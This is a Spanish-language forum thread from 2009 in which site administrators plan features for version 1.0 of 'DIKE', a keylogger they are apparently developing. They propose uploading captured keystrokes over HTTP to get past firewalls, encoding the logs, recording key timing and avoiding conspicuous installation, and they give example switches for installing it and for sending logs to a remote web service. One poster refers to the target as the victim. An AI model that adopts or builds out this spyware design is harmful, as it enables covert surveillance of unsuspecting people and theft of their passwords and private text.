MUSICONICA
Páginas: [1]   Ir Abajo
  Imprimir  
Autor Tema: Version 1.0  (Leído 594 veces)
0 Usuarios y 1 Visitante están viendo este tema.
Iker
Administrador
Cuasi CuTeano
*
Desconectado Desconectado

Mensajes: 125



Ver Perfil WWW
« en: 30 de Julio de 2009, 10:39:28 »

Bueno pos el presidente de por si jode mucho y uno que trabaja ( xDD ) y vive ocupado pos le toca de vez en cuando atenderlo, osease darle cita; así que echen requerimientos para la versión 1.0 de DIKE.

Salu2.

PD: No se den garra.

Att: Iker
En línea

Iker
Administrador
Cuasi CuTeano
*
Desconectado Desconectado

Mensajes: 125



Ver Perfil WWW
« Respuesta #1 en: 30 de Julio de 2009, 10:51:13 »

Jo, se me había olvidado poner las que están sugeridas después de la charla de ayer con el flaco.

* Deshabilitar el logueo en Unicode.
* No usar FTP para la subida de logs.
* Realizar la subida de logs mediante HTTP por ser menos firewaliado y no tener que usar credenciales (Un CGI, script vbs, jsp, php, yo que coños se; lo que les venga en gana).
* Codificar el Log ( Codificar = simple = caesar, enigma, corrimiento, xor5, etc...).
* Loguear los tiempos transcurridos entre las teclas presionadas.
* Crear un reproductor del log ( el flaco se ofreció a hacerlo ) ( Dike Log Player xD ).
* Que funque en Seven xD.
* Alternativas a Hook global ( Ideas?... ( Si, puedo volverlo driver pero seria mas escandaloso instalarlo ) ).

Esas son las que hay por el momento así que opinen cuales van y cuales no.

PD: Con esas características el tamaño calculado a ojo cerrado y echando mañas seria de 20 Kb.

Salu2.
En línea

tronador
Administrador
Vago degenerado
*
Desconectado Desconectado

Mensajes: 430


Linuxsss


Ver Perfil WWW
« Respuesta #2 en: 30 de Julio de 2009, 11:30:58 »

no se puede dejar el ftp como alternativa o eso sube mucho el peso?  Tongue
y smtp tampoco se puede agregar como alternativa? Tongue
En línea





Iker
Administrador
Cuasi CuTeano
*
Desconectado Desconectado

Mensajes: 125



Ver Perfil WWW
« Respuesta #3 en: 30 de Julio de 2009, 11:45:35 »

Sip, pero por ejemplo la mayoría de empresas están cerrando SMTP a raíz de que se presentan ataques de envió de SPAM desde la red interna, así que solo aceptan protocolos de correo ( SMTP TLS, SMTP SSL ). Igual uds deciden, si dicen que SMTP queda pos queda no problem.

El problema  de FTP es que es inseguro y la clave queda quemada, entonces al realizar la subida de los logs es posible que el atacado borre la info en el FTP y se queda sin el pan y sin el queso.

Salu2.

Att: Iker
En línea

Alluz
Ministro de Relaciones Exteriores
Administrador
Vago degenerado
*
Desconectado Desconectado

Mensajes: 1.505


Ministro de relaciones exteriores


Ver Perfil
« Respuesta #4 en: 30 de Julio de 2009, 12:34:54 »

El otro día instalé dike en una máquina y ni por el carajos encontré el log de donde guardaba las teclas presionadas. No estaba al lado del dike.exe :S

Me gustaría que:
1. Si le doy ejecutar, solo se ejecute para el usuario actual y el log se guarde al ladito del ejecutable.
2. Si le doy dike.exe -i,  se copie a alguna parte, se instale y guarde el log en algun lado predefinido.
3. Si le doy dike.exe -rl http://host/webservice.php haga lo mismo que 1, pero con remote logs por web.
4. Si le doy dike.exe -i -rl http://host/webservice.php haga lo mismo que 3, pero con logs por web.

Opcional:
5. Si le doy dike.exe -wd World Domination muajajjajajajaja
En línea

Prefiero trabajar que ponerme con tanto bla, bla, bla.
Prefiero crear, desarrollar, experimentar, que copiar resultados de otro lugar.
Prefiero leer, investigar y sacar mis propios conceptos.
Prefiero que me conozcan por lo que hago y por los topics propios y experimentados, que ser conocido como alguien que solo trae links e informacion que nunca ha probado.
Prefiero ir directo y al grano que escribir 10 paginas para decir lo que se puede decir en 1.
>Prefiero ser consciente de mis propias debilidades y fortalezas, que crear una fama sin argumentos validos.
Iker
Administrador
Cuasi CuTeano
*
Desconectado Desconectado

Mensajes: 125



Ver Perfil WWW
« Respuesta #5 en: 30 de Julio de 2009, 02:04:28 »

el 1 ya esta, el 2 ya esta, el 3 es el que propusimos con el flaco; no entiendo el 4; el 5 es facil si le da "dike.exe -wd Word Domination" se inyecta en la memoria de Word y escribe "Dominated success".

Salu2.

Att: Iker
En línea

flacman
Administrador
Vago degenerado
*
Desconectado Desconectado

Mensajes: 2.897


Trabajar, trabajar y trabajar! . Uribe


Ver Perfil WWW
« Respuesta #6 en: 30 de Julio de 2009, 02:40:52 »

jajaj y 6) q se meta al perfíl de WOW de la máquina, le robe todos los puntos de experiencia y se los transfiera a su muñeco xD

Pos yo propondría hacerlo con todo lo q se nos ocurra (smtp, ftp, html, etc) y mas bn compilar "version sin ftp" y así... Para el 3 y 4 RPM se encarga de eso (de montarnos el web service).

para lo del hook.... esta noche cojo google a ver si se me ocurre algo xD
En línea

Posted by
Alluz
Ministro de Relaciones Exteriores
Administrador
Vago degenerado
*
Desconectado Desconectado

Mensajes: 1.505


Ministro de relaciones exteriores


Ver Perfil
« Respuesta #7 en: 30 de Julio de 2009, 04:20:23 »

Estructura de cosa a enviar:

Variable 1=Tiempo tipo unix
Variable 2= Log Teclas capturadas en formato serializado en codigo propio.

El webserver es una sencilla app que:
1. Recibir variable 1 y 2 por post
2. Utilizar un una funcion como fopen para grabar lo recibido

Smiley
En línea

Prefiero trabajar que ponerme con tanto bla, bla, bla.
Prefiero crear, desarrollar, experimentar, que copiar resultados de otro lugar.
Prefiero leer, investigar y sacar mis propios conceptos.
Prefiero que me conozcan por lo que hago y por los topics propios y experimentados, que ser conocido como alguien que solo trae links e informacion que nunca ha probado.
Prefiero ir directo y al grano que escribir 10 paginas para decir lo que se puede decir en 1.
>Prefiero ser consciente de mis propias debilidades y fortalezas, que crear una fama sin argumentos validos.
Páginas: [1]   Ir Arriba
  Imprimir  
 
Ir a:  

Modify by RPM.
Página creada en 0.054 segundos con 20 queries.